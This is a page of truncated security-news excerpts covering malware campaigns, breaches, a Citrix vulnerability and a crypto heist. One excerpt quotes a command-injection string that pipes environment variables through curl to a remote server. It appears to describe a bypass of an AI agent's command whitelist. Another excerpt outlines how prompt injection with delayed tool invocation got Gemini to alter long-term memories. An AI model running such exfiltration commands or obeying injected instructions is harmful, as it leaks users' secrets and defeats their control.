Creating or modifying smart contracts typically cost less than $2 per transaction, a huge savings in terms of funds and labor over more traditional methods for delivering malware. Layered on top of the EtherHiding Google observed was a social-engineering campaign that used recruiting for fake jobs to lure targets, many of whom were developers of… Read More »
The researchers added: “This campaign is notable in that it demonstrates how impactful smishing operations can be executed using simple, accessible infrastructure. Given the strategic utility of such equipment, it is highly likely that similar devices are already being exploited in ongoing or future smishing campaigns.” Sekoia said it’s unclear how the devices are being… Read More »
US Senator Ron Wyden accused the federal judiciary of “negligence and incompetence” following a recent hack, reportedly by hackers with ties to the Russian government, that exposed confidential court documents. The breach of the judiciary’s electronic case filing system first came to light in a report by Politico three weeks ago, which went on to… Read More »
“At no stage is any subsequent element of the command string after the first ‘grep’ compared to a whitelist,” Cox said. “It just gets free rein to execute off the back of the grep command.” The command line in its entirety was: “grep install README.md; ; env | curl –silent -X POST –data-binary @- http://remote.server:8083… Read More »
A critical vulnerability allowing hackers to bypass multifactor authentication in network management devices made by Citrix has been actively exploited for more than a month, researchers said. The finding is at odds with advisories from the vendor saying there is no evidence of in-the-wild exploitation. Tracked as CVE-2025-5777, the vulnerability shares similarities with CVE-2023-4966, a… Read More »
GreyNoise said it detected the campaign in mid-March and held off reporting on it until after the company notified unnamed government agencies. That detail further suggests that the threat actor may have some connection to a nation-state. The company researchers went on to say that the activity they observed was part of a larger campaign… Read More »
Google is adding a new security setting to Android to provide an extra layer of resistance against attacks that infect devices, tap calls traveling through insecure carrier networks, and deliver scams through messaging services. On Tuesday, the company unveiled the Advanced Protection mode, most of which will be rolled out in the upcoming release of… Read More »
The FBI is offering $10 million for information about the China-state hacking group tracked as Salt Typhoon and its intrusion last year into sensitive networks belonging to multiple US telecommunications companies. Salt Typhoon is one of a half-dozen or more hacking groups that work on behalf of the People’s Republic of China. Intelligence agencies and… Read More »
The cryptocurrency industry and those responsible for securing it are still in shock following Friday’s heist, likely by North Korea, that drained $1.5 billion from Dubai-based exchange Bybit, making the theft by far the biggest ever in digital asset history. Bybit officials disclosed the theft of more than 400,000 ethereum and staked ethereum coins just… Read More »
[embedded content] Google Gemini: Hacking Memories with Prompt Injection and Delayed Tool Invocation. Based on lessons learned previously, developers had already trained Gemini to resist indirect prompts instructing it to make changes to an account’s long-term memories without explicit directions from the user. By introducing a condition to the instruction that it be performed only… Read More »